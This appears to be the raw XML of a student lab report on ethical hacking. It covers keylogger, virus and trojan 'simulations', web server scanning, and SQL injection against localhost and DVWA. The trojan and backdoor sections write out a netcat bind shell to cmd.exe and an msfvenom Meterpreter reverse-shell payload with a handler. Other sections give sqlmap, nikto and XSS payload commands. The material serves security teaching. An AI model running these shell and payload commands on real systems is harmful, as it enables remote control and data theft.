    <w:p w14:paraId="507EAA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26618757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LOIC generates mock packets to show how a DDoS attack floods a target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436E34D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B1CAD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color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="SimSun" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Prac4 :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="SimSun" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Implementation of keyloggers, viruses and trojans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9D129">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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</w:pPr>
    </w:p>
    <w:p w14:paraId="69E0092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PART 1 – Keylogger Implementation (Safe Python Keylogger Simulation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55850AA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Tool:</w:t>
      </w:r>
      <w:r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Python (Keylogger Script – Educational Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D26DFF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 Performed:</w:t>
      </w:r>
      <w:r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Kali Linux / Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B08B3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Command/Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A28A5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python3 simple_keylogger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF99F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 Example (Simulation Style):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BE615E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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[</w:t>
      </w:r>
      <w:r>
        <w:rPr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Keylogger Started</w:t>
      </w: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E1E49">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Captured Keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B0D506">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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h e l l o   w o r l d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1188B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Keystrokes saved to: keylog.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFD76B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[</w:t>
      </w:r>
      <w:r>
        <w:rPr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Keylogger Stopped</w:t>
      </w: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D0EA6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light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</w:pPr>
    </w:p>
    <w:p w14:paraId="5AFB2442">
      <w:pPr>
        <w:pStyle w:val="2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  <w:t>PART 2 – Virus Implementation (File-Infector Simulation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B56D29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  <w:t>Tool:</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> Python Script (Sample File Infector)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D02CB3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  <w:t>Where:</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> Virtual Machine (Windows/Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713AA446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  <w:t>Command/Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299471F9">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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python3 dummy_virus.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599DD32F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  <w:t>Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDFE13E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Scanning directory...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499C5C9B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Found </w:t>
      </w:r>
      <w:r>
        <w:rPr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3</w:t>
      </w:r>
      <w:r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files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C82A2E3">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Adding test signature to files...</w:t>
      </w:r>
      <w:r>
        <w:rPr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File</w:t>
      </w:r>
      <w:r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infection simulation complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B81ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light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</w:pPr>
    </w:p>
    <w:p w14:paraId="71899A16">
      <w:pPr>
        <w:pStyle w:val="2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  <w:t>PART 3 – Trojan Implementation (Backdoor Simulation Using Netcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78E94A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  <w:t>Tool:</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> Netcat (nc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C74DE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  <w:t>Where:</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> Kali Linux (Attacker) + Windows VM (Victim Simulation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE6105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  <w:t>Victim Machine Command (Simulated Trojan Running):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC4AF5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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nc -l -p 4444 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9548BC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  <w:t>Attacker Machine Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730C3AD">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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nc &lt;victim-ip&gt; 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BA605">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/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  <w:t>Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A4A87">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Connected </w:t>
      </w:r>
      <w:r>
        <w:rPr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to</w:t>
      </w:r>
      <w:r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192.168.1.10</w:t>
      </w:r>
      <w:r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:</w:t>
      </w:r>
      <w:r>
        <w:rPr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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC6330B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Microsoft Windows [</w:t>
      </w:r>
      <w:r>
        <w:rPr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Version</w:t>
      </w:r>
      <w:r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10.0.19045</w:t>
      </w:r>
      <w:r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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450681F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light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C:\Users\</w:t>
      </w:r>
      <w:r>
        <w:rPr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Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="SimSun" w:cs="Calibri Light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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500FDA34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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</w:pPr>
    </w:p>
    <w:p w14:paraId="6106B66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PART 4 – Backdoor Payload Simulation (Metasploit Payload Demonstration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA0886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Tool:</w:t>
      </w:r>
      <w:r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Metasploit (msfvenom + msfconsole)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C96237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Where:</w:t>
      </w:r>
      <w:r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Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A1B9B6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/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Command to Generate Dummy Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E5563">
      <w:pP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359A088">
      <w:pP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msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 -f exe -o test_backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE8BED">
      <w:pP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B22662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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A383DDF">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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Payload size: </w:t>
      </w:r>
      <w:r>
        <w:rPr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73802</w:t>
      </w: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bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB349F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Saved </w:t>
      </w:r>
      <w:r>
        <w:rPr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as</w:t>
      </w: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: test_backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588EDBC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Execution in Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48933CF2">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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use exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr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set</w:t>
      </w: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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr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set</w:t>
      </w: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LHOST 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr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set</w:t>
      </w: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LPORT 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486DB47B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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F11203">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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</w:pPr>
    </w:p>
    <w:p w14:paraId="787CD7A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Meterpreter Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5714BED6">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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[*]</w:t>
      </w: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Meterpreter session opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF55D2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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B6BA24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs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</w:pPr>
    </w:p>
    <w:p w14:paraId="17BAB83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PART 5 – Antivirus Detection Test (VirusTotal Scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F03ED5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Tool:</w:t>
      </w:r>
      <w:r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VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA36E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Where:</w:t>
      </w:r>
      <w:r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Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2362F3F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Action:</w:t>
      </w:r>
      <w:r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Uploaded the simulated virus/keylogger .exe file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D1CB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Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1324B338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File:</w:t>
      </w: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test_backdoor.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr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Detection:</w:t>
      </w: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42</w:t>
      </w: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/</w:t>
      </w:r>
      <w:r>
        <w:rPr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60</w:t>
      </w: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engines flagged the file</w:t>
      </w:r>
      <w:r>
        <w:rPr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Type:</w:t>
      </w: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Reverse Shell Payload (Simulation)</w:t>
      </w:r>
      <w:r>
        <w:rPr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Behavior:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/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 xml:space="preserve"> Detects suspicious code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="SimSun" w:cs="Calibri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  <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A81F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752C3D35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  <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Prac 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Use of software tools/commands for web servers and web applications hacking and generate analysis report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460DBC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Fingerprinting a Web Server (Localhost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180ACA5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Tool: WhatWeb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101B2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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69229C2C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whatweb http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE40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(simulated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5690BD51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http://localhost [200 OK]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBABF7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Server: Apache/2.4.54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC0C68B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X-Powered-By: PHP/7.4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218DBBF5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Country: RESERVED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55706A6A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Title: Worker Login Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AF3820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Technology: Apache, PHP, HTML5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610918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63EBFA82">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Identifies the backend server, PHP version, and technologies.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Useful for deciding what vulnerabilities may exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF630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2. Directory &amp; File Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B858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Tool: Dirb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B22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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FB9108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dirb http://localhost/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7DA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7970CEB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---- DIRB v2.22 ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D76424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GENERATED WORDLIST: common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29B1F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9C1D81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+ http://localhost/admin/ (CODE:200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24A51F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+ http://localhost/login/ (CODE:200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF6623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+ http://localhost/backup.zip (CODE:200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E1851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+ http://localhost/phpinfo.php (CODE:200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7BF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1F8965DA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin panel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backup file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phpinfo.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, all of which expose sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751512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3. Web Server Vulnerability Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447446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Tool: Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB78E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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BECD1AB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nikto -h http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173446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B73B5AF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+ SSL: Not enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310DD5EA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+ Server leaks inodes via ETags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD43597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+ Outdated Apache version found: 2.4.54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18DBEA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+ Found /phpinfo.php (possible info disclosure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B975CC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+ Allowed HTTP Methods: GET, POST, HEAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E912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26C039F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nikto identifies outdated versions and misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C89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4. SQL Injection Detection (Local DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF6B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Tool: sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9906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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629380BA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sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=123; security=low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBE47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(simulated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D24A1D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[INFO] Testing connection to target URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B72266F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[INFO] Parameter 'id' appears to be injectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35393961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[INFO] Type: Boolean-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A2258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[INFO] Payload: id=1 AND 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58145113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Database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E772E34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+ dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3454BC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+ users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA393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135D0909">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap detects the injectable parameter and extracts sample database names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733050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5. CMS Vulnerability Scan (WordPress on localhost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9A5F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Tool: WPScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0052C8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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB09A5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wpscan --url http://localhost/wordpress --enumerate vp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D9F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DBF72BC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[+] WordPress version 5.8 detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A154FA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[+] 4 vulnerable plugins found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C45BF44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- contact-form-7 (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC77DFC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- elementor (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523932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2249F0C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shows vulnerable plugins — common in real-world attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A67B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6. XSS Testing Using Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ECFC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Tool: Burp Suite Community</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F61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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FADD3E9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Open your browser → Proxy → Intercept ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA77EAB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Visit http://localhost/comment.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3249C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Modify a parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190613E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&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF69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Burp Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C3144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Request intercepted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1AD8BE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POST /comment.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF9BF1A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comment=&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34250643">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>In browser (simulation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E0C90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Popup triggered: XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4AA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3A5DC331">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Demonstrates reflected cross-site scripting on a test server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F487D93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F46F90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  <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Prac 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Use of software tools/commands for performing sql injection and session hijacking and generate analysis report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597200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SQL Injection – Tools, Commands, and Demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5CC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1.1 SQL Injection Using SQLMap (Command Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B548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Target (Local Machine Example):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A03DA6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http://localhost/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1869D0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SQLMap Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78B3EE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sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=abcd1234; security=low" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B74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It Does</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD8171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Tests SQL injection on the parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BBAE22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Uses your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>session cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to stay logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70141F46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Extracts the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>list of databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F00A0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Sample Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66280F6E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[+] testing connection to the target URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4E44D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[+] parameter 'id' is vulnerable to SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1722AE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[+] back-end DBMS is MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9A5CB5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available databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE34A05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[*] dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199B797C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[*] information_schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791ACF3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[*] mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA4D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 Extract Tables</w:t>
      </w:r>
    </w:p>
